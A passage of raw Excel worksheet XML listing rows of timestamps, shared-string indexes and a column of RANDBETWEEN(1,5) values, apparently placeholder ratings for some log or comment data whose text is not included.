      <c r="A15483" s="1">
        <v>43220.37096064815</v>
      </c>
      <c r="C15483" t="s">
        <v>48</v>
      </c>
      <c r="E15483" t="s">
        <v>13929</v>
      </c>
      <c r="F15483">
        <f t="shared" ca="1" si="241"/>
        <v>5</v>
      </c>
    </row>
    <row r="15484" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15484" s="1">
        <v>43220.358194444445</v>
      </c>
      <c r="C15484" t="s">
        <v>4429</v>
      </c>
      <c r="D15484" t="s">
        <v>17</v>
      </c>
      <c r="E15484" t="s">
        <v>13776</v>
      </c>
      <c r="F15484">
        <f t="shared" ca="1" si="241"/>
        <v>1</v>
      </c>
    </row>
    <row r="15485" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15485" s="1">
        <v>43220.337268518517</v>
      </c>
      <c r="C15485" t="s">
        <v>48</v>
      </c>
      <c r="E15485" s="2" t="s">
        <v>13930</v>
      </c>
      <c r="F15485">
        <f t="shared" ca="1" si="241"/>
        <v>4</v>
      </c>
    </row>
    <row r="15486" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A15486" s="1">
        <v>43220.268645833334</v>
      </c>
      <c r="C15486" t="s">
        <v>48</v>
      </c>
      <c r="E15486" s="2" t="s">
        <v>13931</v>
      </c>
      <c r="F15486">
        <f t="shared" ca="1" si="241"/>
        <v>4</v>
      </c>
    </row>
    <row r="15487" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15487" s="1">
        <v>43220.243206018517</v>
      </c>
      <c r="C15487" t="s">
        <v>1130</v>
      </c>
      <c r="D15487" t="s">
        <v>713</v>
      </c>
      <c r="E15487" s="2" t="s">
        <v>13932</v>
      </c>
      <c r="F15487">
        <f t="shared" ca="1" si="241"/>
        <v>5</v>
      </c>
    </row>
    <row r="15488" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15488" s="1">
        <v>43220.158645833333</v>
      </c>
      <c r="C15488" t="s">
        <v>1068</v>
      </c>
      <c r="D15488" t="s">
        <v>112</v>
      </c>
      <c r="E15488" s="2" t="s">
        <v>13933</v>
      </c>
      <c r="F15488">
        <f t="shared" ca="1" si="241"/>
        <v>3</v>
      </c>
    </row>
    <row r="15489" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15489" s="1">
        <v>43220.136678240742</v>
      </c>
      <c r="C15489" t="s">
        <v>41</v>
      </c>
      <c r="E15489" s="2" t="s">
        <v>13934</v>
      </c>
      <c r="F15489">
        <f t="shared" ca="1" si="241"/>
        <v>3</v>
      </c>
    </row>
    <row r="15490" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15490" s="1">
        <v>43220.118750000001</v>
      </c>
      <c r="C15490" t="s">
        <v>5162</v>
      </c>
      <c r="D15490" t="s">
        <v>80</v>
      </c>
      <c r="E15490" s="2" t="s">
        <v>13935</v>
      </c>
      <c r="F15490">
        <f t="shared" ref="F15490:F15553" ca="1" si="242">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="15491" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A15491" s="1">
        <v>43220.085138888891</v>
      </c>
      <c r="C15491" t="s">
        <v>10</v>
      </c>
      <c r="D15491" t="s">
        <v>6</v>
      </c>
      <c r="E15491" s="2" t="s">
        <v>13936</v>
      </c>
      <c r="F15491">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15492" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15492" s="1">
        <v>43219.996527777781</v>
      </c>
      <c r="C15492" t="s">
        <v>6</v>
      </c>
      <c r="D15492" t="s">
        <v>25</v>
      </c>
      <c r="E15492" t="s">
        <v>13937</v>
      </c>
      <c r="F15492">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15493" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A15493" s="1">
        <v>43219.822465277779</v>
      </c>
      <c r="C15493" t="s">
        <v>41</v>
      </c>
      <c r="E15493" s="2" t="s">
        <v>13938</v>
      </c>
      <c r="F15493">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15494" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15494" s="1">
        <v>43219.689884259256</v>
      </c>
      <c r="C15494" t="s">
        <v>134</v>
      </c>
      <c r="D15494" t="s">
        <v>14</v>
      </c>
      <c r="E15494" s="2" t="s">
        <v>13939</v>
      </c>
      <c r="F15494">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15495" s="1">
        <v>43219.666307870371</v>
      </c>
      <c r="C15495" t="s">
        <v>1130</v>
      </c>
      <c r="D15495" t="s">
        <v>271</v>
      </c>
      <c r="E15495" t="s">
        <v>13940</v>
      </c>
      <c r="F15495">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15496" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15496" s="1">
        <v>43219.629351851851</v>
      </c>
      <c r="C15496" t="s">
        <v>220</v>
      </c>
      <c r="E15496" s="2" t="s">
        <v>13941</v>
      </c>
      <c r="F15496">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15497" s="1">
        <v>43219.485138888886</v>
      </c>
      <c r="C15497" t="s">
        <v>253</v>
      </c>
      <c r="E15497" t="s">
        <v>13942</v>
      </c>
      <c r="F15497">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15498" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A15498" s="1">
        <v>43219.418900462966</v>
      </c>
      <c r="C15498" t="s">
        <v>3515</v>
      </c>
      <c r="D15498" t="s">
        <v>330</v>
      </c>
      <c r="E15498" s="2" t="s">
        <v>13943</v>
      </c>
      <c r="F15498">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15499" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15499" s="1">
        <v>43219.373900462961</v>
      </c>
      <c r="C15499" t="s">
        <v>17</v>
      </c>
      <c r="E15499" s="2" t="s">
        <v>13944</v>
      </c>
      <c r="F15499">
        <f t="shared" ca="1" si="242"/>
        <v>3</v>
      </c>
    </row>
    <row r="15500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15500" s="1">
        <v>43219.303981481484</v>
      </c>
      <c r="C15500" t="s">
        <v>301</v>
      </c>
      <c r="E15500" t="s">
        <v>13945</v>
      </c>
      <c r="F15500">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15501" s="1">
        <v>43219.294768518521</v>
      </c>
      <c r="C15501" t="s">
        <v>139</v>
      </c>
      <c r="E15501" t="s">
        <v>13946</v>
      </c>
      <c r="F15501">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15502" s="1">
        <v>43219.231539351851</v>
      </c>
      <c r="C15502" t="s">
        <v>41</v>
      </c>
      <c r="E15502" t="s">
        <v>13947</v>
      </c>
      <c r="F15502">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15503" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A15503" s="1">
        <v>43219.195277777777</v>
      </c>
      <c r="C15503" t="s">
        <v>318</v>
      </c>
      <c r="E15503" s="2" t="s">
        <v>13948</v>
      </c>
      <c r="F15503">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15504" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15504" s="1">
        <v>43219.155578703707</v>
      </c>
      <c r="C15504" t="s">
        <v>1130</v>
      </c>
      <c r="D15504" t="s">
        <v>367</v>
      </c>
      <c r="E15504" s="2" t="s">
        <v>13949</v>
      </c>
      <c r="F15504">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15505" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15505" s="1">
        <v>43219.125127314815</v>
      </c>
      <c r="C15505" t="s">
        <v>1130</v>
      </c>
      <c r="E15505" s="2" t="s">
        <v>13950</v>
      </c>
      <c r="F15505">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15506" s="1">
        <v>43218.932430555556</v>
      </c>
      <c r="C15506" t="s">
        <v>8364</v>
      </c>
      <c r="D15506" t="s">
        <v>194</v>
      </c>
      <c r="E15506" t="s">
        <v>13951</v>
      </c>
      <c r="F15506">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15507" s="1">
        <v>43218.917083333334</v>
      </c>
      <c r="C15507" t="s">
        <v>229</v>
      </c>
      <c r="D15507" t="s">
        <v>107</v>
      </c>
      <c r="E15507" t="s">
        <v>13952</v>
      </c>
      <c r="F15507">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15508" s="1">
        <v>43218.906157407408</v>
      </c>
      <c r="C15508" t="s">
        <v>229</v>
      </c>
      <c r="D15508" t="s">
        <v>56</v>
      </c>
      <c r="E15508" t="s">
        <v>13952</v>
      </c>
      <c r="F15508">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15509" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15509" s="1">
        <v>43218.800081018519</v>
      </c>
      <c r="C15509" t="s">
        <v>542</v>
      </c>
      <c r="D15509" t="s">
        <v>374</v>
      </c>
      <c r="E15509" s="2" t="s">
        <v>13953</v>
      </c>
      <c r="F15509">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15510" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15510" s="1">
        <v>43218.727800925924</v>
      </c>
      <c r="C15510" t="s">
        <v>1130</v>
      </c>
      <c r="D15510" t="s">
        <v>1056</v>
      </c>
      <c r="E15510" s="2" t="s">
        <v>13954</v>
      </c>
      <c r="F15510">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15511" s="1">
        <v>43218.674409722225</v>
      </c>
      <c r="C15511" t="s">
        <v>41</v>
      </c>
      <c r="E15511" t="s">
        <v>13955</v>
      </c>
      <c r="F15511">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15512" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15512" s="1">
        <v>43218.662719907406</v>
      </c>
      <c r="C15512" t="s">
        <v>60</v>
      </c>
      <c r="D15512" t="s">
        <v>41</v>
      </c>
      <c r="E15512" s="2" t="s">
        <v>13956</v>
      </c>
      <c r="F15512">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15513" s="1">
        <v>43218.654293981483</v>
      </c>
      <c r="C15513" t="s">
        <v>229</v>
      </c>
      <c r="D15513" t="s">
        <v>1056</v>
      </c>
      <c r="E15513" t="s">
        <v>13952</v>
      </c>
      <c r="F15513">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15514" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15514" s="1">
        <v>43218.586134259262</v>
      </c>
      <c r="C15514" t="s">
        <v>1130</v>
      </c>
      <c r="D15514" t="s">
        <v>232</v>
      </c>
      <c r="E15514" s="2" t="s">
        <v>13957</v>
      </c>
      <c r="F15514">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15515" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15515" s="1">
        <v>43218.518888888888</v>
      </c>
      <c r="C15515" t="s">
        <v>60</v>
      </c>
      <c r="D15515" t="s">
        <v>667</v>
      </c>
      <c r="E15515" s="2" t="s">
        <v>13958</v>
      </c>
      <c r="F15515">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15516" s="1">
        <v>43218.503645833334</v>
      </c>
      <c r="C15516" t="s">
        <v>41</v>
      </c>
      <c r="E15516" t="s">
        <v>13959</v>
      </c>
      <c r="F15516">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15517" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15517" s="1">
        <v>43218.473124999997</v>
      </c>
      <c r="C15517" t="s">
        <v>9609</v>
      </c>
      <c r="D15517" t="s">
        <v>94</v>
      </c>
      <c r="E15517" s="2" t="s">
        <v>13960</v>
      </c>
      <c r="F15517">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15518" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15518" s="1">
        <v>43218.466724537036</v>
      </c>
      <c r="C15518" t="s">
        <v>60</v>
      </c>
      <c r="D15518" t="s">
        <v>82</v>
      </c>
      <c r="E15518" s="2" t="s">
        <v>13961</v>
      </c>
      <c r="F15518">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15519" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15519" s="1">
        <v>43218.410532407404</v>
      </c>
      <c r="C15519" t="s">
        <v>1130</v>
      </c>
      <c r="D15519" t="s">
        <v>14</v>
      </c>
      <c r="E15519" s="2" t="s">
        <v>13962</v>
      </c>
      <c r="F15519">
        <f t="shared" ca="1" si="242"/>
        <v>3</v>
      </c>
    </row>
    <row r="15520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15520" s="1">
        <v>43218.379629629628</v>
      </c>
      <c r="C15520" t="s">
        <v>41</v>
      </c>
      <c r="E15520" t="s">
        <v>13963</v>
      </c>
      <c r="F15520">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15521" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15521" s="1">
        <v>43218.334999999999</v>
      </c>
      <c r="C15521" t="s">
        <v>48</v>
      </c>
      <c r="E15521" s="2" t="s">
        <v>13964</v>
      </c>
      <c r="F15521">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15522" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15522" s="1">
        <v>43218.312175925923</v>
      </c>
      <c r="C15522" t="s">
        <v>48</v>
      </c>
      <c r="E15522" s="2" t="s">
        <v>13965</v>
      </c>
      <c r="F15522">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15523" s="1">
        <v>43218.296400462961</v>
      </c>
      <c r="C15523" t="s">
        <v>10</v>
      </c>
      <c r="D15523" t="s">
        <v>192</v>
      </c>
      <c r="E15523" t="s">
        <v>13966</v>
      </c>
      <c r="F15523">
        <f t="shared" ca="1" si="242"/>
        <v>3</v>
      </c>
    </row>
    <row r="15524" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15524" s="1">
        <v>43218.296215277776</v>
      </c>
      <c r="C15524" t="s">
        <v>60</v>
      </c>
      <c r="D15524" t="s">
        <v>107</v>
      </c>
      <c r="E15524" s="2" t="s">
        <v>13967</v>
      </c>
      <c r="F15524">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15525" s="1">
        <v>43218.230891203704</v>
      </c>
      <c r="C15525" t="s">
        <v>3994</v>
      </c>
      <c r="D15525" t="s">
        <v>7</v>
      </c>
      <c r="E15525" t="s">
        <v>13951</v>
      </c>
      <c r="F15525">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15526" s="1">
        <v>43218.116597222222</v>
      </c>
      <c r="C15526" t="s">
        <v>454</v>
      </c>
      <c r="E15526" t="s">
        <v>13968</v>
      </c>
      <c r="F15526">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15527" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15527" s="1">
        <v>43218.113888888889</v>
      </c>
      <c r="C15527" t="s">
        <v>1064</v>
      </c>
      <c r="D15527" t="s">
        <v>94</v>
      </c>
      <c r="E15527" s="2" t="s">
        <v>13969</v>
      </c>
      <c r="F15527">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15528" s="1">
        <v>43218.080428240741</v>
      </c>
      <c r="C15528" t="s">
        <v>48</v>
      </c>
      <c r="E15528" t="s">
        <v>13970</v>
      </c>
      <c r="F15528">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15529" s="1">
        <v>43218.040925925925</v>
      </c>
      <c r="C15529" t="s">
        <v>253</v>
      </c>
      <c r="E15529" t="s">
        <v>13971</v>
      </c>
      <c r="F15529">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15530" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15530" s="1">
        <v>43218.025729166664</v>
      </c>
      <c r="C15530" t="s">
        <v>1194</v>
      </c>
      <c r="D15530" t="s">
        <v>36</v>
      </c>
      <c r="E15530" s="2" t="s">
        <v>13972</v>
      </c>
      <c r="F15530">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15531" s="1">
        <v>43218.005509259259</v>
      </c>
      <c r="C15531" t="s">
        <v>151</v>
      </c>
      <c r="D15531" t="s">
        <v>750</v>
      </c>
      <c r="E15531" t="s">
        <v>13951</v>
      </c>
      <c r="F15531">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15532" s="1">
        <v>43217.998923611114</v>
      </c>
      <c r="C15532" t="s">
        <v>6</v>
      </c>
      <c r="D15532" t="s">
        <v>25</v>
      </c>
      <c r="E15532" t="s">
        <v>13973</v>
      </c>
      <c r="F15532">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15533" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15533" s="1">
        <v>43217.921273148146</v>
      </c>
      <c r="C15533" t="s">
        <v>542</v>
      </c>
      <c r="D15533" t="s">
        <v>232</v>
      </c>
      <c r="E15533" s="2" t="s">
        <v>13974</v>
      </c>
      <c r="F15533">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15534" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A15534" s="1">
        <v>43217.880532407406</v>
      </c>
      <c r="C15534" t="s">
        <v>10</v>
      </c>
      <c r="D15534" t="s">
        <v>151</v>
      </c>
      <c r="E15534" s="2" t="s">
        <v>13975</v>
      </c>
      <c r="F15534">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15535" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15535" s="1">
        <v>43217.869872685187</v>
      </c>
      <c r="C15535" t="s">
        <v>1068</v>
      </c>
      <c r="D15535" t="s">
        <v>82</v>
      </c>
      <c r="E15535" s="2" t="s">
        <v>13976</v>
      </c>
      <c r="F15535">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15536" s="1">
        <v>43217.723692129628</v>
      </c>
      <c r="C15536" t="s">
        <v>10</v>
      </c>
      <c r="D15536" t="s">
        <v>6</v>
      </c>
      <c r="E15536" t="s">
        <v>13977</v>
      </c>
      <c r="F15536">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15537" s="1">
        <v>43217.715821759259</v>
      </c>
      <c r="C15537" t="s">
        <v>10</v>
      </c>
      <c r="D15537" t="s">
        <v>271</v>
      </c>
      <c r="E15537" t="s">
        <v>13978</v>
      </c>
      <c r="F15537">
        <f t="shared" ca="1" si="242"/>
        <v>3</v>
      </c>
    </row>
    <row r="15538" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15538" s="1">
        <v>43217.705833333333</v>
      </c>
      <c r="C15538" t="s">
        <v>10</v>
      </c>
      <c r="D15538" t="s">
        <v>89</v>
      </c>
      <c r="E15538" s="2" t="s">
        <v>13979</v>
      </c>
      <c r="F15538">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15539" s="1">
        <v>43217.689328703702</v>
      </c>
      <c r="C15539" t="s">
        <v>10</v>
      </c>
      <c r="D15539" t="s">
        <v>6</v>
      </c>
      <c r="E15539" t="s">
        <v>13980</v>
      </c>
      <c r="F15539">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15540" s="1">
        <v>43217.681307870371</v>
      </c>
      <c r="C15540" t="s">
        <v>10</v>
      </c>
      <c r="D15540" t="s">
        <v>20</v>
      </c>
      <c r="E15540" t="s">
        <v>13981</v>
      </c>
      <c r="F15540">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15541" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15541" s="1">
        <v>43217.672812500001</v>
      </c>
      <c r="C15541" t="s">
        <v>10</v>
      </c>
      <c r="D15541" t="s">
        <v>23</v>
      </c>
      <c r="E15541" s="2" t="s">
        <v>13982</v>
      </c>
      <c r="F15541">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15542" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15542" s="1">
        <v>43217.670624999999</v>
      </c>
      <c r="C15542" t="s">
        <v>10</v>
      </c>
      <c r="D15542" t="s">
        <v>178</v>
      </c>
      <c r="E15542" s="2" t="s">
        <v>13983</v>
      </c>
      <c r="F15542">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15543" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15543" s="1">
        <v>43217.614027777781</v>
      </c>
      <c r="C15543" t="s">
        <v>10</v>
      </c>
      <c r="D15543" t="s">
        <v>151</v>
      </c>
      <c r="E15543" s="2" t="s">
        <v>13984</v>
      </c>
      <c r="F15543">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15544" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15544" s="1">
        <v>43217.594965277778</v>
      </c>
      <c r="C15544" t="s">
        <v>10</v>
      </c>
      <c r="D15544" t="s">
        <v>23</v>
      </c>
      <c r="E15544" s="2" t="s">
        <v>13985</v>
      </c>
      <c r="F15544">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15545" s="1">
        <v>43217.580023148148</v>
      </c>
      <c r="C15545" t="s">
        <v>6</v>
      </c>
      <c r="D15545" t="s">
        <v>25</v>
      </c>
      <c r="E15545" t="s">
        <v>13986</v>
      </c>
      <c r="F15545">
        <f t="shared" ca="1" si="242"/>
        <v>1</v>
      </c>
    </row>
    <row r="15546" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15546" s="1">
        <v>43217.578993055555</v>
      </c>
      <c r="C15546" t="s">
        <v>1194</v>
      </c>
      <c r="D15546" t="s">
        <v>178</v>
      </c>
      <c r="E15546" s="2" t="s">
        <v>13987</v>
      </c>
      <c r="F15546">
        <f t="shared" ca="1" si="242"/>
        <v>3</v>
      </c>
    </row>
    <row r="15547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15547" s="1">
        <v>43217.543263888889</v>
      </c>
      <c r="C15547" t="s">
        <v>10</v>
      </c>
      <c r="D15547" t="s">
        <v>52</v>
      </c>
      <c r="E15547" t="s">
        <v>13988</v>
      </c>
      <c r="F15547">
        <f t="shared" ca="1" si="242"/>
        <v>4</v>
      </c>
    </row>
    <row r="15548" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A15548" s="1">
        <v>43217.502384259256</v>
      </c>
      <c r="C15548" t="s">
        <v>6</v>
      </c>
      <c r="D15548" t="s">
        <v>114</v>
      </c>
      <c r="E15548" s="2" t="s">
        <v>13989</v>
      </c>
      <c r="F15548">
        <f t="shared" ca="1" si="242"/>
        <v>5</v>
      </c>
    </row>
    <row r="15549" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15549" s="1">
        <v>43217.486863425926</v>
      </c>
      <c r="C15549" t="s">
        <v>3443</v>
      </c>
      <c r="D15549" t="s">
        <v>11</v>
      </c>
      <c r="E15549" s="2" t="s">
        <v>13990</v>
      </c>
      <c r="F15549">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15550" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15550" s="1">
        <v>43217.450891203705</v>
      </c>
      <c r="C15550" t="s">
        <v>10</v>
      </c>
      <c r="D15550" t="s">
        <v>158</v>
      </c>
      <c r="E15550" t="s">
        <v>13991</v>
      </c>
      <c r="F15550">
        <f t="shared" ca="1" si="242"/>
        <v>3</v>
      </c>
    </row>
    <row r="15551" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15551" s="1">
        <v>43217.405243055553</v>
      </c>
      <c r="C15551" t="s">
        <v>1194</v>
      </c>
      <c r="D15551" t="s">
        <v>178</v>
      </c>
      <c r="E15551" s="2" t="s">
        <v>13992</v>
      </c>
      <c r="F15551">
        <f t="shared" ca="1" si="242"/>
        <v>3</v>
      </c>
    </row>
    <row r="15552" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15552" s="1">
        <v>43217.402187500003</v>
      </c>
      <c r="C15552" t="s">
        <v>10</v>
      </c>
      <c r="D15552" t="s">
        <v>271</v>
      </c>
      <c r="E15552" t="s">
        <v>13993</v>
      </c>
      <c r="F15552">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15553" s="1">
        <v>43217.386944444443</v>
      </c>
      <c r="C15553" t="s">
        <v>65</v>
      </c>
      <c r="E15553" t="s">
        <v>13994</v>
      </c>
      <c r="F15553">
        <f t="shared" ca="1" si="242"/>
        <v>2</v>
      </c>
    </row>
    <row r="15554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15554" s="1">
        <v>43217.372013888889</v>
      </c>
      <c r="C15554" t="s">
        <v>559</v>
      </c>
      <c r="F15554">
        <f t="shared" ref="F15554:F15617" ca="1" si="243">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="15555" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15555" s="1">
        <v>43217.370312500003</v>
      </c>
      <c r="C15555" t="s">
        <v>48</v>
      </c>
      <c r="E15555" s="2" t="s">
        <v>13995</v>
      </c>
      <c r="F15555">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15556" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15556" s="1">
        <v>43217.355891203704</v>
      </c>
      <c r="C15556" t="s">
        <v>41</v>
      </c>
      <c r="E15556" s="2" t="s">
        <v>13996</v>
      </c>
      <c r="F15556">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15557" s="1">
        <v>43217.354837962965</v>
      </c>
      <c r="C15557" t="s">
        <v>559</v>
      </c>
      <c r="E15557" t="s">
        <v>13997</v>
      </c>
      <c r="F15557">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15558" s="1">
        <v>43217.296516203707</v>
      </c>
      <c r="C15558" t="s">
        <v>41</v>
      </c>
      <c r="E15558" t="s">
        <v>13998</v>
      </c>
      <c r="F15558">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15559" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15559" s="1">
        <v>43217.257800925923</v>
      </c>
      <c r="C15559" t="s">
        <v>60</v>
      </c>
      <c r="D15559" t="s">
        <v>817</v>
      </c>
      <c r="E15559" s="2" t="s">
        <v>13999</v>
      </c>
      <c r="F15559">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
